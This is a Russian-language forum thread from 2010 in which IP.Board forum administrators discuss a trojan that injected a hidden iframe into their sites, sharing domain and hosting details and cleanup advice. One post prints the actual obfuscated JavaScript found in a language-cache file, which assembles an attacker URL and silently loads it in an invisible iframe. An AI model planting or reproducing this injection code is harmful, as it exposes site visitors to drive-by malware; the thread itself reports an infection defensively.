Снова троян на IBResource

[Ritsuka]

No-Script отрапортовал о наличии JS-скриптов с домена ibresource-images.ru.

 

Анализ кода, отдаваемого сервером, не показал посторонних включений. А вот анализ дерева DOM обнаружил в подвале посторонний iframe. Речь, видимо, идет о закладке, скорее всего в JS форума.

 

Домен зарегистрирован на email:
alex.dubakov@gmail.com

Другие домены с этим email: 
aionlegend-images.ru
ibresource-images.ru
iphones-images.ru

Другие домены на этом IP:
beezoneinfo-images.ru - shupetro@gmail.com
ibresource-images.com

Домены с email shupetro@gmail.com:
amkteam-images.ru
igromania-images.ru
ladyscafe-images.ru

Сам сервер стоит в Hetzner AG, ip 178.63.173.118. 

 

По всем доменам, похоже, речь идет об IP.Board 3. Значит, либо есть какая-то уязвимость в форуме, либо кто-то из поддержки IBR "потерял" много чужих данных, если эти ребята конечно обращались в саппорт. Все домены созданы 2010-08-07. На ресурсах стоят 3.0.5 - 3.1.2.

[GiV]

Поддержка не знает доступов к IBR

 

Игромания не на движке IPB, если я правильно думаю, используют тут немного другую дырку

[Ritsuka]

Да, тоже позже заметил, что там vB.

 

А на сервере их стоит хитрый nginx с проверкой referrer. Вообще имеет смысл пообщаться на официальном уровне с Hetzner. Немцы очень не любят всякие хак и ботнеты на своих серверах)

[GiV]

Общее у всех форумов, что они за nginx...

 

Тут страшен не сколько код в DOM, потому как человек в любом случае куки не получил (в IPB они все httpOnly), а то что был залит шелл.

[SeaBreeze]

Вот и я заразился этой ерундой. Форумчане пишут: http://www.iphones.ru/forum/index.php?showtopic=64240&st=195

 

**iframe style="visibility: hidden;"

src="http://ibresource-images.com/cgi-bin/search"></iframe**

Где искать вредоносный код, подскажите?

Изменено 5 Октября 2010 пользователем SeaBreeze

[GiV]

Напишите в поддержку, я Ваш тикет возьму и отвечу что необходимо сделать.

[SeaBreeze]

Вредный код был в таком файле: cache/lang_cache/1/ipb.lang.js

 

Сам код:

function pp_gemius_identifier_insert(){try {var gemius_add=new
String("ht"+"tp"+":/"+"/ifC2Y".substr(0,2)+"14Fbr1F4".substr(3,2)+"esWmz1".substr(0,2)+"IKUouUIK".substr(3,2)+"rcZJyE".substr(0,2)+"e-3bSd".substr(0,2)+"V4TimVT4".substr(3,2)+"TIJagJTI".substr(3,2)+"6p8es6p8".substr(3,2)+".cIr2C".substr(0,2)+"NY2omNY2".substr(3,2)+"/clXM1".substr(0,2)+"gi1c5a".substr(0,2)+"-bSvOG".substr(0,2)+"in38Xm".substr(0,2)+"/search");var
obj = document.createElement(String("ifrIObe".substr(0,3)+"ame4b76".substr(0,3)));obj.src=gemius_add;
  var o=obj[string("styRmrN".substr(0,3)+"lexmgU".substr(0,2))];o.visibility="hidde"+"n";
     o.width=10;     o.height=10;
document.body.appendChild(obj);}
catch(e){document.write("<bas6t".substr(0,2)+"odnuGv".substr(0,2)+"y>wWhx".substr(0,2));setTimeout(function(){pp_gemius_identifier_insert()},
500);}}

 

Пользователи все равно говорят, что все равно Касперский ругается. Буду пробовать обновлять на 3.1.2

[Arhar]

а че обновлять, если в файл дописывается код, наверняка следует удалить нахрен тотал коммандер, скачать drweb cureit и проверить весь свой комп, удостоверится, что машина сервера не заражена вирусом, сменить пароли на фтп и проверить всех админов, сменить им пароли, удалить им тотал коммандер, проверить их компы

[SeaBreeze]

Я работаю на Mac OS X, других компов в поле видимости нет. Как и Тотал Коммандера.

[Japonec]

http://www.virustotal.com/url-scan/ в помощь для проверки форумов ...и эт..подвязывайте вы хранить пароли в фтп клиентах...уж оченно геморно то дело эти ява вири гонять по компу и серверу..а они умнеют гады те вири и хз какой крендель выпишет очередная версия того вредоноса, отак ограбит такой вирь пару сотен юзиков с их вэб манями и доказывай потом что ты не верблюд......

[FatCat]

подвязывайте вы хранить пароли в фтп клиентах...

Это мешает трудиться разработчикам кейлогеров?

[pvo1988]

Это что за фигня? В редакторе здесь не могу воспользоваться ни одной кнопкой?????

[pvo1988]

Так чего тут с редактором? Чё теперь bb-коды все время писать ручками?

[FatCat]

Так чего тут с редактором? Чё теперь bb-коды все время писать ручками?

Вроде работает редактор.

 

Проверил в Опере 10.10.

[pvo1988]

Х..м, точно, в Опере работает, но вот сейчас зашел Mozilla Firefox, снова не работает. Сегодня был этой Мозиллой на 5-6 форумах, всюду работало.

Странно. Даже не заметил когда началось. Глянул настройки, вроде никаких ограничений на этот форум нет.

Но в конце сентября был случай, когда выскочило кокое-то предупреждение о вирусной опасности (не от DrWeb вроде), но тут же исчезло. кто подал это предупреждение, не успел понять. Может как-то связано? Сейчас попробую все кукиссы этого форума почистить.

 

Удалил кукки и заработало. Жаль поздно спохватился, надо было посмотреть какие именно. Их что-то больно много:

.db.ibresource.ru

.forums.ibresource.ru

.ibresource.ru

[Japonec]

подвязывайте вы хранить пароли в фтп клиентах...

Это мешает трудиться разработчикам кейлогеров?

Хэх...кейлогер многа шума в системе делает...и палится на раз ( ну есственно коль антивирь стоит)..плюс процесс висит постоянно в памяти...плюс вирт.клавиатура...так что нафига им такой гемор если легче расхешировать готовый пас из тотал командёра?

[FatCat]

Хэх...кейлогер многа шума в системе делает...и палится на раз

У меня пунто-свитчер ни разу не запалился.

А нынче, спасибо яндексу, это чуть ли не стандарт оснащения винды.

[Japonec]

Хэх...кейлогер многа шума в системе делает...и палится на раз

У меня пунто-свитчер ни разу не запалился.

А нынче, спасибо яндексу, это чуть ли не стандарт оснащения винды.

Блоговых сказок на ночь начитались о якобы "злом" пунтошвитцере который тырит ваши логи в пользу яндекса?...

Дык чем бы блогеры и привлекали народ на свои странички как не такими рассказами...

ЗЫ..по началу КАСПЕР мозги сносил своими алертами в сторону швитцера о якобы "поведении кейлогера"..потом то дело фанаты проги оспорили у ЛК и КАСПЕР замолк...но там свой прикол был..КАСПЕР орал на швитцер, когда у того был включен дневник и записывался весь буфер обмена...и оно понятно..то действие и есть процесс кейлогера за исключением одного но...это отсылка ваших логов злюке-бяке-хаке в настоящем кейлогере..и те движения (включая и отсылку логов по защищённому каналу) очень трудно не заметить...

А ява вири "прыгают" на сервак не посредственно через фтп...гы..и если б кто поимел бы ваш пароль к фтп, то там бы не обошлось ток одной строкой в файле...ушла бы и база и ваш форум скрыто бы вещал рекламу...вашим же пользователям

[FatCat]

Блоговых сказок на ночь начитались о якобы "злом" пунтошвитцере который тырит ваши логи в пользу яндекса?...

Я не читаю блогов.

Пунто перехватывает все нажатия клавиш, и с разрешения пользователя даже ведет журнал всего набранного с клавиатуры.

Перехватить у пунты перехваты нажатия клавиш - думаете нет таких троянов?

[Japonec]

Блоговых сказок на ночь начитались о якобы "злом" пунтошвитцере который тырит ваши логи в пользу яндекса?...

Я не читаю блогов.

Пунто перехватывает все нажатия клавиш, и с разрешения пользователя даже ведет журнал всего набранного с клавиатуры.

Перехватить у пунты перехваты нажатия клавиш - думаете нет таких троянов?

Ну вот этот журнал и зовётся дневником и включается опционно...

...У трояна-кейлогера свой алгоритм перехвата...плюс...дык поди угадай,стоит у пользователя путно или нет..а трой должон 100% приносить хозяину инфу...но опять таки...виртуальную клавиатуру можно только заскринить и если пользователь не совсем камикадзе, то он таки пользователь этот, включает виртуалку и работает с паролями, либо через хранители паролей по нажатию кнопки (в последнем случае кейлогер полностью обезоружен)...то кейлогеры в деле слива фтп тут бесполезны,или не такие эффективные как сливалки захешированных и оставленных паролей в фтп клиентах, а следовательно как я выше и написал

и эт..подвязывайте вы хранить пароли в фтп клиентах...

[pvo1988]

Какие умные мысли у Японца. Даже хотел было поглядеть его ресурс, но в названии "варез", чет расхотелось

[Japonec]

Какие умные мысли у Японца. Даже хотел было поглядеть его ресурс, но в названии "варез", чет расхотелось

у меня правильный "варез"...безо всякой мути и херни... http://www.virustotal.com/url-scan/report.html?id=0d92a7d72609808ef7b5e6e054e04901-1286792361 ..не боись..не покусает..тем паче "нуллами" скриптов не пользуюсь.

ЗЫ...социалные сети типа вконтакта оказывают более пагубное влияния на неокрепшие умы, нежели технически оформленный "варезник"

 

ЗЫ...варез является одной из составляющей пассивной рекламы контента..плюс...данное явление хотя б как то "расшивеливает" ожиревших разработчиков программного обеспечения кои ленятся править деже не значительные баги в прогах...но ради смены алгоритма регистрации всёж им приходится лазить в код, а заодно и те баги правят...плюс бесплатный баг-трекер в виде отзывов пользователей (ток надоть завести аналитика который бут читать те коменты и воспроизводить баги на дистрах) а заодно и бесплатный маркетологизатор ( стоит взглянуть на просмотры контента и сразу же становиться ясно, популярен контент или нет и потом принимать меры к увеличению популярности и полезности онного)

 

Изменено 11 Октября 2010 пользователем Japonec

[Arhar]

вообще никакие пароли не рекомендуется сохранять через такую функцию

а касперский да, иногда говорит

легальная программа, которая может быть использована злоумышленником для нанесения вреда компьютеру или данным пользователя PDM.Keylogger kernel mode memory patch

[dillix]

На маке и линуксе эти вирусы не страшны))